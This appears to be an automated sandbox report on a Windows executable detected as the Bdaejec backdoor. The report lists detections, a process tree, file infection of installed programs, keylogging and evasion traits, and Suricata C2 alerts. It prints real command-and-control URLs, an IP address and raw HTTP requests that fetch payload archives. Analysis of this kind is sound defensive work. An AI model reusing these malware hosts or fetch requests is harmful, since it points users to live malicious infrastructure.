Edit tour

Windows Analysis Report
BXOZIGZEUa.exe

Overview

General Information

Sample name:	BXOZIGZEUa.exe renamed because original name is a hash value
Original sample name:	8f5469d96f148afd08a0f693684f9bb0195a5291eb2437214c01465b463acbf8.exe
Analysis ID:	1585133
MD5:	fa07873f37b171a5567a9b4b3f2c65eb
SHA1:	47d5210522d8c54d3076c1467f2f495025037bb6
SHA256:	8f5469d96f148afd08a0f693684f9bb0195a5291eb2437214c01465b463acbf8
Tags:	exeuser-zhuzhu0009
Infos:

Detection

Bdaejec

Score:	66
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Bdaejec

AI detected suspicious sample

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has a writeable .text section

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read device registry values (via SetupAPI)

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries device information via Setup API

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

System is w10x64

BXOZIGZEUa.exe (PID: 7720 cmdline: "C:\Users\user\Desktop\BXOZIGZEUa.exe" MD5: FA07873F37B171A5567A9B4B3F2C65EB)

conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

JdEV.exe (PID: 7800 cmdline: C:\Users\user\AppData\Local\Temp\JdEV.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)

WerFault.exe (PID: 8032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 1608 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: JdEV.exe PID: 7800	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security

Suricata Signatures

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T06:01:13.644513+0100	2807908	1	Malware Command and Control Activity Detected	192.168.2.11	49736	44.221.84.105	799	TCP
2025-01-07T06:01:17.906835+0100	2807908	1	Malware Command and Control Activity Detected	192.168.2.11	49762	44.221.84.105	799	TCP

ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T06:01:12.995032+0100	2838522	1	Malware Command and Control Activity Detected	192.168.2.11	64859	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: BXOZIGZEUa.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ddos.dnsnb8.net:799/cj//k1.rarL	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarCHITECTURE=x86PROCESS	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net/$3	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar;	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarD	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarDC:	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.raro	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarY	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rars	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar-	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarx	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rars	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net/j&a	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar$	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net/x&	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarQ	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarL	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe

ReversingLabs: Detection: 97%

Multi AV Scanner detection for submitted file

Source: BXOZIGZEUa.exe	ReversingLabs: Detection: 94%
Source: BXOZIGZEUa.exe	Virustotal: Detection: 87%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: BXOZIGZEUa.exe

Joe Sandbox ML: detected

Source: BXOZIGZEUa.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

File created: C:\Users\user\Desktop\uninstall.log

Jump to behavior

Source: BXOZIGZEUa.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Workspace\Driver\DriverUninstall\Release\DriverUninstall.pdb source: BXOZIGZEUa.exe
Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.3.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_001CB7F2 lstrlenW,SetLastError,FindFirstFileW,GetLastError,__wfullpath,__wsplitpath_s,__wmakepath_s,	1_2_001CB7F2
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_001CB3FE GetModuleHandleW,GetProcAddress,FindFirstFileW,	1_2_001CB3FE
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_001DD5ED __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	1_2_001DD5ED
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Code function: 3_2_003429E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,	3_2_003429E2

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe

Code function: 3_2_00342B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

3_2_00342B8C

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2838522 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup : 192.168.2.11:64859 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.11:49762 -> 44.221.84.105:799
Source: Network traffic	Suricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.11:49736 -> 44.221.84.105:799

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 799

Source: global traffic

TCP traffic: 192.168.2.11:49736 -> 44.221.84.105:799

Source: Joe Sandbox View

IP Address: 44.221.84.105 44.221.84.105

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe

Code function: 3_2_00341099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,

3_2_00341099

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: ddos.dnsnb8.net

Source: JdEV.exe, 00000003.00000003.1360033401.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, JdEV.exe, 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: JdEV.exe, 00000003.00000003.1379761142.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/
Source: JdEV.exe, 00000003.00000002.1613503596.0000000001263000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/$3
Source: JdEV.exe, 00000003.00000003.1379761142.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/j&a
Source: JdEV.exe, 00000003.00000003.1379761142.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/x&
Source: JdEV.exe, 00000003.00000003.1379761142.00000000011CE000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000003.00000003.1379761142.0000000001223000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000003.00000002.1613503596.000000000119E000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000003.00000003.1379761142.0000000001241000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: JdEV.exe, 00000003.00000003.1379761142.0000000001223000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar$
Source: JdEV.exe, 00000003.00000003.1379761142.0000000001223000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar;
Source: JdEV.exe, 00000003.00000003.1379761142.0000000001223000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarD
Source: JdEV.exe, 00000003.00000003.1379761142.0000000001241000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarDC:
Source: JdEV.exe, 00000003.00000003.1379761142.0000000001223000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarL
Source: JdEV.exe, 00000003.00000003.1379761142.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rars
Source: JdEV.exe, 00000003.00000002.1613503596.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: JdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar-
Source: JdEV.exe, 00000003.00000002.1613503596.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarCHITECTURE=x86PROCESS
Source: JdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarL
Source: JdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarQ
Source: JdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarY
Source: JdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.raro
Source: JdEV.exe, 00000003.00000002.1613503596.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rars
Source: JdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarx
Source: Amcache.hve.3.dr	String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.3.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.3.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.3.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.3.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.3.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.3.dr	String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.3.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.3.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.3.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.3.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.3.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.3.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.3.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: JdEV.exe, 00000003.00000002.1613503596.0000000001241000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000003.00000003.1379761142.0000000001241000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: SciTE.exe.3.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.3.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

Code function: 1_2_00210549 GetClientRect,GetAsyncKeyState,SendMessageW,SetScrollPos,

1_2_00210549

Source: SciTE.exe.3.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_0d9c64b2-b

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_002120D5 GetKeyState,GetKeyState,GetKeyState,GetKeyState,	1_2_002120D5
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_0020A90D ScreenToClient,_memset,_free,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,	1_2_0020A90D
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_001E4F49 IsWindow,SendMessageW,GetCapture,GetKeyState,GetKeyState,GetKeyState,ImmGetContext,ImmGetOpenStatus,ImmReleaseContext,GetFocus,IsWindow,IsWindow,IsWindow,ClientToScreen,IsWindow,ClientToScreen,	1_2_001E4F49
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_001E3094 IsWindow,SendMessageW,GetCapture,GetKeyState,GetKeyState,GetKeyState,ImmGetContext,ImmGetOpenStatus,ImmReleaseContext,GetFocus,IsWindow,IsWindow,IsWindow,ClientToScreen,IsWindow,ClientToScreen,	1_2_001E3094
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_0020794D SendMessageW,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageW,	1_2_0020794D
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_0021FE15 GetWindowRect,GetKeyState,GetKeyState,GetKeyState,KillTimer,GetFocus,SetTimer,	1_2_0021FE15

System Summary

PE file contains section with special chars

Source: MyProg.exe.3.dr

Static PE information: section name: Y|uR

PE file has a writeable .text section

Source: JdEV.exe.1.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	File created: C:\Windows\inf\oem0.PNF	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	File created: C:\Windows\inf\oem1.PNF	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	File created: C:\Windows\inf\oem3.PNF	Jump to behavior

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_002BE120	1_2_002BE120
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_002C0170	1_2_002C0170
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_0025083D	1_2_0025083D
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_0020CF37	1_2_0020CF37
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_002CF14C	1_2_002CF14C
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_002BF9C8	1_2_002BF9C8
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Code function: 3_2_00346076	3_2_00346076
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Code function: 3_2_00346D00	3_2_00346D00

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\JdEV.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: String function: 002BEABF appears 50 times
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: String function: 002BF180 appears 48 times
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: String function: 002BEA56 appears 181 times

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 1608

Source: MyProg.exe.3.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Source: BXOZIGZEUa.exe, 00000001.00000000.1357824062.000000000033B000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameDriverUninstall.exe@ vs BXOZIGZEUa.exe
Source: BXOZIGZEUa.exe	Binary or memory string: OriginalFilenameDriverUninstall.exe@ vs BXOZIGZEUa.exe

Source: BXOZIGZEUa.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: JdEV.exe.1.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: JdEV.exe.1.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: JdEV.exe.1.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: classification engine

Classification label: mal66.spre.troj.evad.winEXE@7/16@1/1

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe

Code function: 3_2_0034119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,

3_2_0034119F

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

Code function: 1_2_001CD36B CoInitialize,CoCreateInstance,

1_2_001CD36B

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

Code function: 1_2_002B86A5 GetUserDefaultUILanguage,FindResourceExW,FindResourceW,LoadResource,GlobalAlloc,

1_2_002B86A5

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

File created: C:\Users\user\Desktop\uninstall.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7800

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

File created: C:\Users\user\AppData\Local\Temp\JdEV.exe

Jump to behavior

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: BXOZIGZEUa.exe	ReversingLabs: Detection: 94%
Source: BXOZIGZEUa.exe	Virustotal: Detection: 87%

Source: unknown	Process created: C:\Users\user\Desktop\BXOZIGZEUa.exe "C:\Users\user\Desktop\BXOZIGZEUa.exe"
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Process created: C:\Users\user\AppData\Local\Temp\JdEV.exe C:\Users\user\AppData\Local\Temp\JdEV.exe
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 1608
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Process created: C:\Users\user\AppData\Local\Temp\JdEV.exe C:\Users\user\AppData\Local\Temp\JdEV.exe	Jump to behavior

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Section loaded: devrtl.dll	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Section loaded: spinf.dll	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Section loaded: drvstore.dll	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: version.dll	Jump to behavior
